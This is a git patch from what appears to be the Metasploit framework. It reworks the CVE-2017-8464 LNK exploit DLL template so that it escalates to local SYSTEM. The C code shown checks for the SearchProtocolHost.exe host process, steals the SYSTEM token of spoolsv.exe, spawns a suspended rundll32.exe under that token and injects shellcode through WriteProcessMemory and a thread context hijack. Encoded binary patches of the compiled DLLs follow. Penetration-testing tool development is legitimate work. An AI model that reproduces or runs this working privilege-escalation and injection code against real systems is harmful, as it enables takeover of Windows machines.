From d0ebfa195082e712049bd9fc018a17940b847630 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 3 Oct 2017 13:43:49 -0400
Subject: [PATCH] Change the template technicque to work as an LPE

---
 data/exploits/cve-2017-8464/src/build.sh      |   2 +
 data/exploits/cve-2017-8464/src/template.c    | 251 ++++++++++++++----
 data/exploits/cve-2017-8464/src/template.h    |   8 +
 .../cve-2017-8464/template_x64_windows.dll    | Bin 19456 -> 21504 bytes
 .../cve-2017-8464/template_x86_windows.dll    | Bin 14848 -> 17408 bytes
 .../windows/local/cve_2017_8464_lnk_lpe.rb    |  14 +-
 6 files changed, 222 insertions(+), 53 deletions(-)
 mode change 100755 => 100644 data/exploits/cve-2017-8464/template_x64_windows.dll
 mode change 100755 => 100644 data/exploits/cve-2017-8464/template_x86_windows.dll

diff --git a/data/exploits/cve-2017-8464/src/build.sh b/data/exploits/cve-2017-8464/src/build.sh
index 878e3e3fa8..202daa5413 100755
--- a/data/exploits/cve-2017-8464/src/build.sh
+++ b/data/exploits/cve-2017-8464/src/build.sh
@@ -8,8 +8,10 @@ ${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
 ${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
 ${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
 rm -f temp.dll *.o
+chmod -x ../template_x64_windows.dll
 
 ${CCx86}-gcc -c -Os template.c -Wall -shared
 ${CCx86}-dllwrap --def template.def *.o -o temp.dll
 ${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
 rm -f temp.dll *.o
+chmod -x ../template_x86_windows.dll
diff --git a/data/exploits/cve-2017-8464/src/template.c b/data/exploits/cve-2017-8464/src/template.c
index 01553dc914..af8924e605 100644
--- a/data/exploits/cve-2017-8464/src/template.c
+++ b/data/exploits/cve-2017-8464/src/template.c
@@ -1,25 +1,17 @@
-// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
-// - removed ExitThread(0) to prevent an Explorer crash
-// - added Mutex to prevent invoking payload multiple times (at least try)
 #include <windows.h>
+#include <sddl.h>
+#include <tchar.h>
+#include <tlhelp32.h>
+#include <userenv.h>
+
 #include "template.h"
 
-void inline_bzero(void *p, size_t l)
-{
-	BYTE *q = (BYTE *)p;
-	size_t x = 0;
-	for (x = 0; x < l; x++)
-		*(q++) = 0x00;
-}
+void ExecutePayload(HANDLE hDll);
 
-void ExecutePayload(void);
-
-BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
-{
-	switch (dwReason)
-	{
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+	switch (dwReason) {
 	case DLL_PROCESS_ATTACH:
-		ExecutePayload();
+		ExecutePayload(hDll);
 		break;
 
 		case DLL_PROCESS_DETACH:
@@ -31,65 +23,232 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
 		case DLL_THREAD_DETACH:
 		break;
 	}
-
 	return TRUE;
 }
 
-void ExecutePayload(void)
-{
+BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) {
+	int result;
+
+	if (strlen(szStr) < strlen(szSuffix)) {
+		return FALSE;
+	}
+	if (bCaseSensitive) {
+		result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+	}
+	else {
+		result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+	}
+	return result == 0;
+}
+
+BOOL GetProcessSid(HANDLE hProc, PSID *pSid) {
+	HANDLE hToken;
+	DWORD dwLength = 0;
+	TOKEN_USER *tuUser = NULL;
+	SIZE_T szSid = 0;
+
+	*pSid = NULL;
+	do {
+		if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) {
+			return FALSE;
+		}
+
+		GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength);
+		tuUser = (TOKEN_USER *)malloc(dwLength);
+		if (tuUser == NULL) {
+			break;
+		}
+
+		if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) {
+			break;
+		}
+
+		szSid = GetLengthSid(tuUser->User.Sid);
+		*pSid = LocalAlloc(LPTR, szSid);
+		if (*pSid == NULL) {
+			break;
+		}
+
+		if (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid)) {
+			LocalFree(*pSid);
+			*pSid = NULL;
+		}
+	} while (FALSE);
+
+	if (tuUser != NULL) {
+		free(tuUser);
+	}
+	if (hToken) {
+		CloseHandle(hToken);
+	}
+
+	if (*pSid != NULL) {
+		return TRUE;
+	}
+	return FALSE;
+}
+
+BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) {
+	PSID pTestSid = NULL;
+	PSID pTargetSid = NULL;
+
+	if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) {
+		return FALSE;
+	}
+
+	if (!GetProcessSid(hProc, &pTestSid)) {
+		LocalFree(pTargetSid);
+		return FALSE;
+	}
+
+	*pbResult = EqualSid(pTestSid, pTargetSid);
+	LocalFree(pTargetSid);
+	LocalFree(pTestSid);
+	return TRUE;
+}
+
+DWORD FindProcessId(LPCTSTR szProcessName) {
+	HANDLE hProcessSnap;
+	PROCESSENTRY32 pe32;
+	DWORD result = 0;
+
+	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (hProcessSnap == INVALID_HANDLE_VALUE) {
+		return 0;
+	}
+
+	pe32.dwSize = sizeof(PROCESSENTRY32);
+	if (!Process32First(hProcessSnap, &pe32)) {
+		CloseHandle(hProcessSnap);
+		return 0;
+	}
+
+	do {
+		if (!strcmp(szProcessName, pe32.szExeFile)) {
+			result = pe32.th32ProcessID;
+			break;
+		}
+	} while (Process32Next(hProcessSnap, &pe32));
+	CloseHandle(hProcessSnap);
+	return result;
+}
+
+HANDLE GetPayloadToken(void) {
+	HANDLE hTokenHandle = NULL;
+	HANDLE hProcessHandle = NULL;
+	BOOL bIsSystem = FALSE;
+	DWORD dwPid = 0;
+	CHAR Path[MAX_PATH + 1];
+
+	ZeroMemory(Path, sizeof(Path));
+	GetModuleFileNameA(NULL, Path, MAX_PATH);
+	if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) {
+		return NULL;
+	}
+	/* loaded into the context of SearchProtocolHost.exe */
+
+	if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) {
+		return NULL;
+	}
+	/* and running as NT_AUTHORITY SYSTEM */
+
+	dwPid = FindProcessId("spoolsv.exe");
+	if (!dwPid) {
+		return NULL;
+	}
+
+	hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
+	if (!hProcessHandle) {
+		return NULL;
+	}
+
+	bIsSystem = FALSE;
+	if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) {
+		return NULL;
+	}
+	/* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */
+
+	OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle);
+	CloseHandle(hProcessHandle);
+	return hTokenHandle;
+}
+
+DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) {
+	/* wait for the process to exit or 10 seconds before cleaning up */
+	WaitForSingleObject(pExploitData->hProcess, 10000);
+	CloseHandle(pExploitData->hProcess);
+	CloseHandle(pExploitData->hMutex);
+
+	/* this does not return */
+	FreeLibraryAndExitThread(pExploitData->hModule, 0);
+	return 0;
+}
+
+void ExecutePayload(HANDLE hDll) {
 	PROCESS_INFORMATION pi;
 	STARTUPINFO si;
 	CONTEXT ctx;
 	LPVOID ep;
-	HANDLE hMutex;
 	SECURITY_ATTRIBUTES MutexAttributes;
+	SIZE_T dwBytesWritten = 0;
+	PEXPLOIT_DATA pExploitData = NULL;
+	HANDLE hToken;
 
-	inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
+	pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA));
+	if (!pExploitData) {
+		return;
+	}
+
+	/* keep a reference to the module for synchronization purposes */
+	GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule));
+
+	ZeroMemory(&MutexAttributes, sizeof(MutexAttributes));
 	MutexAttributes.nLength = sizeof(MutexAttributes);
 	MutexAttributes.bInheritHandle = TRUE; // inherit the handle
-	hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
-	if(hMutex == NULL)
-	{
+	pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!");
+	if (!pExploitData->hMutex) {
 		return;
 	}
 
-	if(GetLastError() == ERROR_ALREADY_EXISTS)
-	{
-		CloseHandle(hMutex);
+	if (GetLastError() == ERROR_ALREADY_EXISTS) {
+		CloseHandle(pExploitData->hMutex);
 		return;
 	}
 
-	if(GetLastError() == ERROR_ACCESS_DENIED)
-	{
-		CloseHandle(hMutex);
+	if (GetLastError() == ERROR_ACCESS_DENIED) {
+		CloseHandle(pExploitData->hMutex);
 		return;
 	}
 
-	// Start up the payload in a new process
-	inline_bzero(&si, sizeof(si));
+	hToken = GetPayloadToken();
+
+	ZeroMemory(&si, sizeof(si));
 	si.cb = sizeof(si);
 
-	// Create a suspended process, write shellcode into stack, resume it
-	if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
-		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+	/* start up the payload in a new process */
+	if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
+		ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
 		GetThreadContext(pi.hThread, &ctx);
-
 		ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-		WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+		WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten);
+		if (dwBytesWritten == SCSIZE) {
 
 #ifdef _WIN64
-		ctx.Rip = (DWORD64)ep;
+			ctx.Rip = (DWORD64)ep;
 #else
-		ctx.Eip = (DWORD)ep;
+			ctx.Eip = (DWORD)ep;
 #endif
 
-		SetThreadContext(pi.hThread, &ctx);
-		ResumeThread(pi.hThread);
+			SetThreadContext(pi.hThread, &ctx);
+			ResumeThread(pi.hThread);
 
-		CloseHandle(pi.hThread);
-		CloseHandle(pi.hProcess);
+			CloseHandle(pi.hThread);
+			pExploitData->hProcess = pi.hProcess;
+		}
 	}
 
-	CloseHandle(hMutex);
+	if (hToken) {
+		CloseHandle(hToken);
+	}
+	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL);
 }
-
diff --git a/data/exploits/cve-2017-8464/src/template.h b/data/exploits/cve-2017-8464/src/template.h
index 7a674c3006..7181e46cba 100644
--- a/data/exploits/cve-2017-8464/src/template.h
+++ b/data/exploits/cve-2017-8464/src/template.h
@@ -1,3 +1,11 @@
 #define SCSIZE 2048
 unsigned char code[SCSIZE] = "PAYLOAD:";
 
+typedef struct {
+	HANDLE hModule;
+	HANDLE hMutex;
+	HANDLE hProcess;
+} EXPLOIT_DATA, *PEXPLOIT_DATA;
+
+#define SIDSTR_SYSTEM _T("s-1-5-18")
+#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult)
diff --git a/data/exploits/cve-2017-8464/template_x64_windows.dll b/data/exploits/cve-2017-8464/template_x64_windows.dll
old mode 100755
new mode 100644
index 40958f8986cbabb90b1e2174d1dcaa6eaa1fa83c..eda57c8d927d138f1786132d7d1324c704bb70c8
GIT binary patch
literal 21504
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
